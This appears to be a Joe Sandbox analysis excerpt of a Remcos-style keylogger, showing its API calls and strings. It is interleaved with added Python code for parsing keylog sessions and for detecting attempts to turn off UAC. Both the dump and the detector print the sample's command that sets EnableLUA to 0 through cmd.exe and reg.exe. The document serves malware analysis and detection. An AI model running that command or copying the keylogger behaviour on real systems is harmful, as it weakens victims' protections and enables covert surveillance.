                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: EventLocalTimewsprintf
                                                                                                                                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                                                                                                                                • API String ID: 1497725170-248792730
                                                                                                                                                • Opcode ID: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                                                                                                                • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                                                                • Opcode Fuzzy Hash: b92970106d7d5ed65003fb4f3b7a0e91fd1e2f7406e6a9ff2526561c329a63fb
                                                                                                                                                • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
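The function above stamps the offline keylog with the session marker it builds from `GetLocalTime` and the format string `[%04i/%02i/%02i %02i:%02i:%02i ` followed by `Offline Keylogger Started` and `]`. The parser below is an added example for triaging such a log; it is not code from the report or from the sample. It assumes the SYSTEMTIME fields are passed in year/month/day order as the format suggests, and that the log has already been decoded to text (the on-disk encoding is not shown in the dump). Because the stamp comes from `GetLocalTime`, the timestamps are in the victim machine's local time zone, not UTC, which matters when correlating with other evidence. The sample log lines are constructed.

```python
"""
Added example (not part of the Joe Sandbox report): split a Remcos-style
offline keylog into sessions using the bracketed timestamp markers the
dumped function writes, e.g. "[2024/12/05 09:41:07 Offline Keylogger Started]".
Assumptions: fields are year/month/day hour:minute:second (as in the format
string) and the file has already been decoded to str.
"""
import re
from datetime import datetime
from typing import Dict, List, Optional, Tuple

# Marker layout taken from the wsprintfW format string in the dump:
# "[%04i/%02i/%02i %02i:%02i:%02i " + label + "]".  The label group is kept
# generic so any bracketed, timestamped marker with the same prefix parses.
MARKER_RE = re.compile(
    r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) ([^\]]+)\]$"
)


def parse_marker(line: str) -> Optional[Tuple[datetime, str]]:
    """Return (local timestamp, label) for a session marker, else None.

    Impossible dates (e.g. month 13) are rejected rather than guessed.
    """
    m = MARKER_RE.match(line.strip())
    if not m:
        return None
    y, mo, d, h, mi, s = (int(m.group(i)) for i in range(1, 7))
    try:
        stamp = datetime(y, mo, d, h, mi, s)  # naive: victim's local time
    except ValueError:
        return None
    return stamp, m.group(7)


def split_sessions(text: str) -> List[Dict]:
    """Group keystroke lines under the marker that precedes them.

    Lines before the first marker are collected under a None timestamp so
    nothing is silently dropped during triage.
    """
    sessions: List[Dict] = []
    current: Optional[Dict] = None
    for raw in text.splitlines():
        line = raw.rstrip("\r\n")
        parsed = parse_marker(line)
        if parsed is not None:
            started, label = parsed
            current = {"started": started, "label": label, "keystrokes": []}
            sessions.append(current)
            continue
        if not line:
            continue
        if current is None:
            current = {"started": None, "label": "<no marker>", "keystrokes": []}
            sessions.append(current)
        current["keystrokes"].append(line)
    return sessions


# Constructed sample log (not captured from the sample).
SAMPLE_LOG = """[2024/12/05 09:41:07 Offline Keylogger Started]
hello world
[2024/12/05 11:02:33 Offline Keylogger Started]
password123
"""


def session_summary(text: str = SAMPLE_LOG) -> List[Tuple[str, int]]:
    """(ISO local timestamp or 'unknown', keystroke line count) per session."""
    out = []
    for s in split_sessions(text):
        when = s["started"].isoformat() if s["started"] else "unknown"
        out.append((when, len(s["keystrokes"])))
    return out


if __name__ == "__main__":
    for when, n in session_summary():
        print(f"{when}: {n} keystroke line(s)")
```

Keep the naive `datetime` as-is until the host's time zone is known from the triage image; converting to UTC too early bakes a guess into the timeline.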
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                                                                • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseCreateHandleSizeSleep
                                                                                                                                                • String ID: XQG
                                                                                                                                                • API String ID: 1958988193-3606453820
                                                                                                                                                • Opcode ID: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                                                                                                                • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                                                                                • Opcode Fuzzy Hash: 09b71735cca9286fb237afdc81f34cc8b89fa37515d8f2a58262fc809d9c95cd
                                                                                                                                                • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                                                                                APIs
                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                                                                                • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                                                                                • GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                                                                                • String ID: 0$MsgWindowClass
                                                                                                                                                • API String ID: 2877667751-2410386613
                                                                                                                                                • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                                                                                                                                • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                                                                                                                                • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                                                                                                                                APIs
                                                                                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004077E5
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 004077EA
                                                                                                                                                Strings
                                                                                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                                                                                                                                • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CloseHandle$CreateProcess
                                                                                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                                                                                                                • API String ID: 2922976086-4183131282
                                                                                                                                                • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                                                                                                                                • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                                                                                                                                • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
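The function above spawns `cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f`, which turns UAC off system-wide (the change takes effect after the next reboot, so the value should be checked on disk as well as at runtime). The detection below is an added example, not code from the report or the sample: it flags both the process-creation command line and the resulting registry write. It assumes Sysmon-style event fields (`EventID`, `CommandLine`, `TargetObject`, `Details`) and the `DWORD (0x00000000)` rendering of the written value; the event records are constructed. It generalizes slightly beyond the dump by also accepting the long `HKEY_LOCAL_MACHINE` hive name and a bare `reg add` without the `.exe` suffix.

```python
"""
Added example (not part of the Joe Sandbox report): flag attempts to disable
UAC by setting EnableLUA=0 under Policies\\System, matching both the reg.exe
command line seen in the dump and the registry value-set event it produces.
Field names follow Sysmon (EID 1 process create, EID 13 registry value set);
that layout is an assumption, and the events below are constructed.
"""
import re
from typing import Dict, Iterable, List

_UAC_KEY = (
    r"(?:HKLM|HKEY_LOCAL_MACHINE)\\SOFTWARE\\Microsoft\\Windows"
    r"\\CurrentVersion\\Policies\\System"
)

# reg[.exe] ADD <key> ... /v EnableLUA ... /d 0  (switch order is free, so
# the /v and /d parts are lookaheads; reg.exe is case-insensitive throughout).
_ENABLE_LUA_OFF = re.compile(
    r"\breg(?:\.exe)?\s+add\s+\"?" + _UAC_KEY + r"\"?"
    r"(?=.*\s/v\s+EnableLUA\b)"
    r"(?=.*\s/d\s+0\b)",
    re.IGNORECASE,
)


def is_uac_disable_cmdline(cmdline: str) -> bool:
    """True for a command line that sets EnableLUA to 0 via reg.exe."""
    return bool(_ENABLE_LUA_OFF.search(cmdline))


def is_uac_disable_regset(ev: Dict) -> bool:
    """True for a registry value-set event writing EnableLUA = 0."""
    target = ev.get("TargetObject", "").lower()
    details = ev.get("Details", "").strip().lower()
    return target.endswith(r"\policies\system\enablelua") and details == "dword (0x00000000)"


def find_uac_disable_events(events: Iterable[Dict]) -> List[Dict]:
    """Return a hit record for every event that disables UAC."""
    hits = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 1 and is_uac_disable_cmdline(ev.get("CommandLine", "")):
            hits.append({"reason": "cmdline", "image": ev.get("Image"), "event": ev})
        elif eid == 13 and is_uac_disable_regset(ev):
            hits.append({"reason": "regset", "image": ev.get("Image"), "event": ev})
    return hits


# Constructed Sysmon-style events.  The first command line is the one from the
# dump; the second is what reg.exe sees once cmd.exe has expanded %windir%.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD "
                    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System "
                    r"/v EnableLUA /t REG_DWORD /d 0 /f"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows"
                    r"\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA",
     "Details": "DWORD (0x00000000)"},
    # Benign: reading the value, and re-enabling UAC.
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe QUERY HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA"},
    {"EventID": 1, "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]


if __name__ == "__main__":
    for hit in find_uac_disable_events(SAMPLE_EVENTS):
        print(hit["reason"], hit["image"])
```

Matching on the command line alone misses the same write done through the registry API (no reg.exe at all), which is why the value-set rule is kept alongside it; a hardened host can additionally enforce the value with Group Policy so a local write is reverted on refresh.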
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: SG$C:\Users\user\Desktop\LdSbZG1iH6.exe
                                                                                                                                                • API String ID: 0-4074075201
                                                                                                                                                • Opcode ID: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                                                                                                                • Instruction ID: 5ffff352cfcc2e87221e4fa572a01d73507d198e899e6baa5594ec663d9dd15d
                                                                                                                                                • Opcode Fuzzy Hash: 534232ae4986bc0cd44d5d9dbb6e579f37bf6e7b645008295a27304146529b35
                                                                                                                                                • Instruction Fuzzy Hash: 8DF02BB0E04600EBCB1477345D296AA3656A780397F40487BF507EB2F2EBBD5C41871E
                                                                                                                                                APIs
                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EF8), ref: 00405120
                                                                                                                                                • SetEvent.KERNEL32(?), ref: 0040512C
                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405137
                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405140
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                                                                                                                • String ID: KeepAlive | Disabled
                                                                                                                                                • API String ID: 2993684571-305739064
                                                                                                                                                • Opcode ID: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                                                                                                                • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                                                                                                                                • Opcode Fuzzy Hash: 260c2b08e01b5d66b359e99273a0c89895ec309b6af50f33d4504d26b953d9d7
                                                                                                                                                • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                                                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 0041AE98
                                                                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                • String ID: Alarm triggered
                                                                                                                                                • API String ID: 614609389-2816303416
                                                                                                                                                • Opcode ID: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                                                                                                                • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                                                                                                                                • Opcode Fuzzy Hash: fc1dfc3d80636db02bd80d67f349f84282c1adb2487fd06cf6dad27e320cdf65
                                                                                                                                                • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                                                                                                                                APIs
                                                                                                                                                • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                                                                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                                                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                                                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                                                                                                                                Strings
                                                                                                                                                • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                                                                                                                • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                                                                                                                • API String ID: 3024135584-2418719853
                                                                                                                                                • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                                                                                                                                • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                                                                                                                                • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                                                                                                                • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                                                                                                                                • Opcode Fuzzy Hash: 3500d967bf213ad3b95b014004bc41782de99095ad53c5e0f3d0147f9504bf37
                                                                                                                                                • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                                                                  • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                                                                  • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4269425633-0
                                                                                                                                                • Opcode ID: 73b334f8cf36ed71725f842c358092b271b71775af86fb3c9ec045b7f77a6464
                                                                                                                                                • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                                                                • Opcode Fuzzy Hash: 73b334f8cf36ed71725f842c358092b271b71775af86fb3c9ec045b7f77a6464
                                                                                                                                                • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                                                                • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                                                                • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                                                                APIs
                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                                                                • _free.LIBCMT ref: 0044F43F
                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                                                                                                                • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                                                                • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                                                                                                                • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                                                                APIs
                                                                                                                                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                                                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1852769593-0
                                                                                                                                                • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                                                                • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                                                                • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 00450A54
                                                                                                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                • _free.LIBCMT ref: 00450A66
                                                                                                                                                • _free.LIBCMT ref: 00450A78
                                                                                                                                                • _free.LIBCMT ref: 00450A8A
                                                                                                                                                • _free.LIBCMT ref: 00450A9C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                                                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                                                                • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                                                                APIs
                                                                                                                                                • _free.LIBCMT ref: 00444106
                                                                                                                                                  • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                                                                  • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                                                                • _free.LIBCMT ref: 00444118
                                                                                                                                                • _free.LIBCMT ref: 0044412B
                                                                                                                                                • _free.LIBCMT ref: 0044413C
                                                                                                                                                • _free.LIBCMT ref: 0044414D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.1964306504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_LdSbZG1iH6.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
